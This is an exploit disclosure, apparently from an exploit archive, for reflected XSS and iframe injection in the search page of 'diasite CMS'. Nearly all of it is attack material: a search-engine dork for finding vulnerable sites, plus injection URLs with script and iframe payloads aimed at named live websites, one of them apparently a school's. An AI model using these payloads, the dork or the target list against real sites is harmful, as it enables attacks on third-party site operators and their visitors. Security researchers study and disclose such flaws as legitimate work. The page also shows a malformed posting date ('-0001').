Diasite CMS Reflected XSS & Iframe injection

Posted on 30 November -0001
<HTML><HEAD><TITLE>diasite CMS Reflected XSS & Iframe injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>----------------------------------------------------------------------
[Description]
#Exploit title: diasite CMS Reflected XSS & Iframe injection
#Exploit author: Implosion
#Date: 07/10/2016
#Dorks: intext: "Powered by diasite"
#Website: www.diasite.fr
#Tested on: Firefox
----------------------------------------------------------------------
[Vulnerability][Reflected XSS]
http://www.diateam.net/Rechercher-14-0-0-0.html?q="><script>alert('XSS')</script>
----------------------------------------------------------------------
[Vulnerability][Iframe Injection]
http://www.diateam.net/Rechercher-14-0-0-0.html?q="><iframe src=https://cxsecurity.com>
----------------------------------------------------------------------
[Example]
http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E
http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%22%3E%3Ciframe%20src=https://cxsecurity.com%3E
----------------------------------------------------------------------
#Discovered By Implosion
#Thanks to: ÐØΨΠ–ŠËRVËR
----------------------------------------------------------------------</BODY></HTML>
TOP
Malware :

None in database
Last 20
Exploits :

Last 20